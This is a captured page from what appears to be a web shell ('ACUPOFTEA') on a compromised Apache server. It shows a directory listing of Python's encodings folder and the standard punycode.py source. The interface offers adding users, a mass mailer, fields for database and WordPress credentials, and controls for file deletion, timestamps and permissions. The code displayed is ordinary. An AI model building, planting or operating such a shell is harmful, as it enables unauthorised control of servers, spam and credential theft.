System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
encodings
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
punycode.py
""" Codec for the Punicode encoding, as specified in RFC 3492 Written by Martin v. Löwis. """ import codecs ##################### Encoding ##################################### def segregate(str): """3.1 Basic code point segregation""" base = bytearray() extended = set() for c in str: if ord(c) < 128: base.append(ord(c)) else: extended.add(c) extended = sorted(extended) return bytes(base), extended def selective_len(str, max): """Return the length of str, considering only characters below max.""" res = 0 for c in str: if ord(c) < max: res += 1 return res def selective_find(str, char, index, pos): """Return a pair (index, pos), indicating the next occurrence of char in str. index is the position of the character considering only ordinals up to and including char, and pos is the position in the full string. index/pos is the starting position in the full string.""" l = len(str) while 1: pos += 1 if pos == l: return (-1, -1) c = str[pos] if c == char: return index+1, pos elif c < char: index += 1 def insertion_unsort(str, extended): """3.2 Insertion unsort coding""" oldchar = 0x80 result = [] oldindex = -1 for c in extended: index = pos = -1 char = ord(c) curlen = selective_len(str, char) delta = (curlen+1) * (char - oldchar) while 1: index,pos = selective_find(str,c,index,pos) if index == -1: break delta += index - oldindex result.append(delta-1) oldindex = index delta = 0 oldchar = char return result def T(j, bias): # Punycode parameters: tmin = 1, tmax = 26, base = 36 res = 36 * (j + 1) - bias if res < 1: return 1 if res > 26: return 26 return res digits = b"abcdefghijklmnopqrstuvwxyz0123456789" def generate_generalized_integer(N, bias): """3.3 Generalized variable-length integers""" result = bytearray() j = 0 while 1: t = T(j, bias) if N < t: result.append(digits[N]) return bytes(result) result.append(digits[t + ((N - t) % (36 - t))]) N = (N - t) // (36 - t) j += 1 def adapt(delta, first, numchars): if first: delta //= 700 else: delta //= 2 delta += delta // numchars # ((base - tmin) * tmax) // 2 == 455 divisions = 0 while delta > 455: delta = delta // 35 # base - tmin divisions += 36 bias = divisions + (36 * delta // (delta + 38)) return bias def generate_integers(baselen, deltas): """3.4 Bias adaptation""" # Punycode parameters: initial bias = 72, damp = 700, skew = 38 result = bytearray() bias = 72 for points, delta in enumerate(deltas): s = generate_generalized_integer(delta, bias) result.extend(s) bias = adapt(delta, points==0, baselen+points+1) return bytes(result) def punycode_encode(text): base, extended = segregate(text) deltas = insertion_unsort(text, extended) extended = generate_integers(len(base), deltas) if base: return base + b"-" + extended return extended ##################### Decoding ##################################### def decode_generalized_number(extended, extpos, bias, errors): """3.3 Generalized variable-length integers""" result = 0 w = 1 j = 0 while 1: try: char = ord(extended[extpos]) except IndexError: if errors == "strict": raise UnicodeError("incomplete punicode string") return extpos + 1, None extpos += 1 if 0x41 <= char <= 0x5A: # A-Z digit = char - 0x41 elif 0x30 <= char <= 0x39: digit = char - 22 # 0x30-26 elif errors == "strict": raise UnicodeError("Invalid extended code point '%s'" % extended[extpos]) else: return extpos, None t = T(j, bias) result += digit * w if digit < t: return extpos, result w = w * (36 - t) j += 1 def insertion_sort(base, extended, errors): """3.2 Insertion unsort coding""" char = 0x80 pos = -1 bias = 72 extpos = 0 while extpos < len(extended): newpos, delta = decode_generalized_number(extended, extpos, bias, errors) if delta is None: # There was an error in decoding. We can't continue because # synchronization is lost. return base pos += delta+1 char += pos // (len(base) + 1) if char > 0x10FFFF: if errors == "strict": raise UnicodeError("Invalid character U+%x" % char) char = ord('?') pos = pos % (len(base) + 1) base = base[:pos] + chr(char) + base[pos:] bias = adapt(delta, (extpos == 0), len(base)) extpos = newpos return base def punycode_decode(text, errors): if isinstance(text, str): text = text.encode("ascii") if isinstance(text, memoryview): text = bytes(text) pos = text.rfind(b"-") if pos == -1: base = "" extended = str(text, "ascii").upper() else: base = str(text[:pos], "ascii", errors) extended = str(text[pos+1:], "ascii").upper() return insertion_sort(base, extended, errors) ### Codec APIs class Codec(codecs.Codec): def encode(self, input, errors='strict'): res = punycode_encode(input) return res, len(input) def decode(self, input, errors='strict'): if errors not in ('strict', 'replace', 'ignore'): raise UnicodeError("Unsupported error handling "+errors) res = punycode_decode(input, errors) return res, len(input) class IncrementalEncoder(codecs.IncrementalEncoder): def encode(self, input, final=False): return punycode_encode(input) class IncrementalDecoder(codecs.IncrementalDecoder): def decode(self, input, final=False): if self.errors not in ('strict', 'replace', 'ignore'): raise UnicodeError("Unsupported error handling "+self.errors) return punycode_decode(input, self.errors) class StreamWriter(Codec,codecs.StreamWriter): pass class StreamReader(Codec,codecs.StreamReader): pass ### encodings module API def getregentry(): return codecs.CodecInfo( name='punycode', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamwriter=StreamWriter, streamreader=StreamReader, )
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
..
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
__pycache__
DIR
-
drwxr-xr-x
2025-08-28 10:58:23
__init__.py
text/x-python
5.51 KB
-rw-r--r--
2018-12-23 09:37:14
aliases.py
text/plain
15.21 KB
-rw-r--r--
2018-12-23 09:37:14
ascii.py
text/plain
1.22 KB
-rw-r--r--
2018-12-23 09:37:14
base64_codec.py
text/plain
1.5 KB
-rw-r--r--
2018-12-23 09:37:14
big5.py
text/x-c++
1019 B
-rw-r--r--
2018-12-23 09:37:14
big5hkscs.py
text/x-c++
1.01 KB
-rw-r--r--
2018-12-23 09:37:14
bz2_codec.py
text/plain
2.2 KB
-rw-r--r--
2018-12-23 09:37:14
charmap.py
text/plain
2.04 KB
-rw-r--r--
2018-12-23 09:37:14
cp037.py
text/plain
12.81 KB
-rw-r--r--
2018-12-23 09:37:14
cp1006.py
text/plain
13.25 KB
-rw-r--r--
2018-12-23 09:37:14
cp1026.py
text/plain
12.81 KB
-rw-r--r--
2018-12-23 09:37:14
cp1125.py
text/plain
33.79 KB
-rw-r--r--
2018-12-23 09:37:14
cp1140.py
text/plain
12.8 KB
-rw-r--r--
2018-12-23 09:37:14
cp1250.py
text/plain
13.37 KB
-rw-r--r--
2018-12-23 09:37:14
cp1251.py
text/plain
13.05 KB
-rw-r--r--
2018-12-23 09:37:14
cp1252.py
text/plain
13.19 KB
-rw-r--r--
2018-12-23 09:37:14
cp1253.py
text/plain
12.79 KB
-rw-r--r--
2018-12-23 09:37:14
cp1254.py
text/plain
13.19 KB
-rw-r--r--
2018-12-23 09:37:14
cp1255.py
text/plain
12.17 KB
-rw-r--r--
2018-12-23 09:37:14
cp1256.py
text/plain
12.51 KB
-rw-r--r--
2018-12-23 09:37:14
cp1257.py
text/plain
13.06 KB
-rw-r--r--
2018-12-23 09:37:14
cp1258.py
text/plain
13.05 KB
-rw-r--r--
2018-12-23 09:37:14
cp273.py
text/plain
13.8 KB
-rw-r--r--
2018-12-23 09:37:14
cp424.py
text/plain
11.77 KB
-rw-r--r--
2018-12-23 09:37:14
cp437.py
text/plain
33.75 KB
-rw-r--r--
2018-12-23 09:37:14
cp500.py
text/plain
12.81 KB
-rw-r--r--
2018-12-23 09:37:14
cp65001.py
text/plain
1.08 KB
-rw-r--r--
2018-12-23 09:37:14
cp720.py
text/plain
13.37 KB
-rw-r--r--
2018-12-23 09:37:14
cp737.py
text/plain
33.87 KB
-rw-r--r--
2018-12-23 09:37:14
cp775.py
text/plain
33.67 KB
-rw-r--r--
2018-12-23 09:37:14
cp850.py
text/plain
33.31 KB
-rw-r--r--
2018-12-23 09:37:14
cp852.py
text/plain
34.18 KB
-rw-r--r--
2018-12-23 09:37:14
cp855.py
text/plain
33.06 KB
-rw-r--r--
2018-12-23 09:37:14
cp856.py
text/plain
12.13 KB
-rw-r--r--
2018-12-23 09:37:14
cp857.py
text/plain
33.11 KB
-rw-r--r--
2018-12-23 09:37:14
cp858.py
text/plain
33.22 KB
-rw-r--r--
2018-12-23 09:37:14
cp860.py
text/plain
33.87 KB
-rw-r--r--
2018-12-23 09:37:14
cp861.py
text/plain
33.82 KB
-rw-r--r--
2018-12-23 09:37:14
cp862.py
text/plain
32.59 KB
-rw-r--r--
2018-12-23 09:37:14
cp863.py
text/plain
33.45 KB
-rw-r--r--
2018-12-23 09:37:14
cp864.py
text/plain
32.87 KB
-rw-r--r--
2018-12-23 09:37:14
cp865.py
text/plain
33.81 KB
-rw-r--r--
2018-12-23 09:37:14
cp866.py
text/plain
33.59 KB
-rw-r--r--
2018-12-23 09:37:14
cp869.py
text/plain
32.19 KB
-rw-r--r--
2018-12-23 09:37:14
cp874.py
text/plain
12.3 KB
-rw-r--r--
2018-12-23 09:37:14
cp875.py
text/plain
12.55 KB
-rw-r--r--
2018-12-23 09:37:14
cp932.py
text/x-c++
1023 B
-rw-r--r--
2018-12-23 09:37:14
cp949.py
text/x-c++
1023 B
-rw-r--r--
2018-12-23 09:37:14
cp950.py
text/x-c++
1023 B
-rw-r--r--
2018-12-23 09:37:14
euc_jis_2004.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
euc_jisx0213.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
euc_jp.py
text/x-c++
1 KB
-rw-r--r--
2018-12-23 09:37:14
euc_kr.py
text/x-c++
1 KB
-rw-r--r--
2018-12-23 09:37:14
gb18030.py
text/x-c++
1.01 KB
-rw-r--r--
2018-12-23 09:37:14
gb2312.py
text/x-c++
1 KB
-rw-r--r--
2018-12-23 09:37:14
gbk.py
text/x-c++
1015 B
-rw-r--r--
2018-12-23 09:37:14
hex_codec.py
text/plain
1.47 KB
-rw-r--r--
2018-12-23 09:37:14
hp_roman8.py
text/plain
13.16 KB
-rw-r--r--
2018-12-23 09:37:14
hz.py
text/x-c++
1011 B
-rw-r--r--
2018-12-23 09:37:14
idna.py
text/x-python
8.88 KB
-rw-r--r--
2025-08-26 08:58:55
iso2022_jp.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_jp_1.py
text/x-c++
1.04 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_jp_2.py
text/x-c++
1.04 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_jp_2004.py
text/x-c++
1.05 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_jp_3.py
text/x-c++
1.04 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_jp_ext.py
text/x-c++
1.04 KB
-rw-r--r--
2018-12-23 09:37:14
iso2022_kr.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_1.py
text/plain
12.87 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_10.py
text/plain
13.27 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_11.py
text/plain
12.05 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_13.py
text/plain
12.96 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_14.py
text/plain
13.33 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_15.py
text/plain
12.9 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_16.py
text/plain
13.24 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_2.py
text/plain
13.09 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_3.py
text/plain
12.78 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_4.py
text/plain
13.06 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_5.py
text/plain
12.71 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_6.py
text/plain
10.58 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_7.py
text/plain
12.54 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_8.py
text/plain
10.78 KB
-rw-r--r--
2018-12-23 09:37:14
iso8859_9.py
text/plain
12.85 KB
-rw-r--r--
2018-12-23 09:37:14
johab.py
text/x-c++
1023 B
-rw-r--r--
2018-12-23 09:37:14
koi8_r.py
text/plain
13.46 KB
-rw-r--r--
2018-12-23 09:37:14
koi8_t.py
text/plain
12.88 KB
-rw-r--r--
2018-12-23 09:37:14
koi8_u.py
text/plain
13.44 KB
-rw-r--r--
2018-12-23 09:37:14
kz1048.py
text/plain
13.4 KB
-rw-r--r--
2018-12-23 09:37:14
latin_1.py
text/plain
1.23 KB
-rw-r--r--
2018-12-23 09:37:14
mac_arabic.py
text/plain
35.61 KB
-rw-r--r--
2018-12-23 09:37:14
mac_centeuro.py
text/plain
13.77 KB
-rw-r--r--
2018-12-23 09:37:14
mac_croatian.py
text/plain
13.31 KB
-rw-r--r--
2018-12-23 09:37:14
mac_cyrillic.py
text/plain
13.14 KB
-rw-r--r--
2018-12-23 09:37:14
mac_farsi.py
text/plain
14.81 KB
-rw-r--r--
2018-12-23 09:37:14
mac_greek.py
text/plain
13.4 KB
-rw-r--r--
2018-12-23 09:37:14
mac_iceland.py
text/plain
13.18 KB
-rw-r--r--
2018-12-23 09:37:14
mac_latin2.py
text/plain
13.79 KB
-rw-r--r--
2018-12-23 09:37:14
mac_roman.py
text/plain
13.16 KB
-rw-r--r--
2018-12-23 09:37:14
mac_romanian.py
text/plain
13.34 KB
-rw-r--r--
2018-12-23 09:37:14
mac_turkish.py
text/plain
13.2 KB
-rw-r--r--
2018-12-23 09:37:14
mbcs.py
text/x-python
1.18 KB
-rw-r--r--
2018-12-23 09:37:14
oem.py
text/x-python
1019 B
-rw-r--r--
2018-12-23 09:37:14
palmos.py
text/plain
13.2 KB
-rw-r--r--
2018-12-23 09:37:14
ptcp154.py
text/plain
13.69 KB
-rw-r--r--
2018-12-23 09:37:14
punycode.py
text/plain
6.72 KB
-rw-r--r--
2018-12-23 09:37:14
quopri_codec.py
text/x-python
1.49 KB
-rw-r--r--
2018-12-23 09:37:14
raw_unicode_escape.py
text/plain
1.18 KB
-rw-r--r--
2018-12-23 09:37:14
rot_13.py
text/plain
2.38 KB
-rwxr-xr-x
2018-12-23 09:37:14
shift_jis.py
text/x-c++
1.01 KB
-rw-r--r--
2018-12-23 09:37:14
shift_jis_2004.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
shift_jisx0213.py
text/x-c++
1.03 KB
-rw-r--r--
2018-12-23 09:37:14
tis_620.py
text/plain
12.01 KB
-rw-r--r--
2018-12-23 09:37:14
undefined.py
text/plain
1.27 KB
-rw-r--r--
2018-12-23 09:37:14
unicode_escape.py
text/plain
1.16 KB
-rw-r--r--
2018-12-23 09:37:14
unicode_internal.py
text/plain
1.17 KB
-rw-r--r--
2018-12-23 09:37:14
utf_16.py
text/plain
5.11 KB
-rw-r--r--
2018-12-23 09:37:14
utf_16_be.py
text/plain
1.01 KB
-rw-r--r--
2018-12-23 09:37:14
utf_16_le.py
text/plain
1.01 KB
-rw-r--r--
2018-12-23 09:37:14
utf_32.py
text/plain
5.01 KB
-rw-r--r--
2018-12-23 09:37:14
utf_32_be.py
text/plain
930 B
-rw-r--r--
2018-12-23 09:37:14
utf_32_le.py
text/plain
930 B
-rw-r--r--
2018-12-23 09:37:14
utf_7.py
text/plain
946 B
-rw-r--r--
2018-12-23 09:37:14
utf_8.py
text/plain
1005 B
-rw-r--r--
2018-12-23 09:37:14
utf_8_sig.py
text/plain
4.04 KB
-rw-r--r--
2018-12-23 09:37:14
uu_codec.py
text/x-python
2.66 KB
-rw-r--r--
2018-12-23 09:37:14
zlib_codec.py
text/plain
2.15 KB
-rw-r--r--
2018-12-23 09:37:14
~ ACUPOFTEA - mail.ontime-ae.com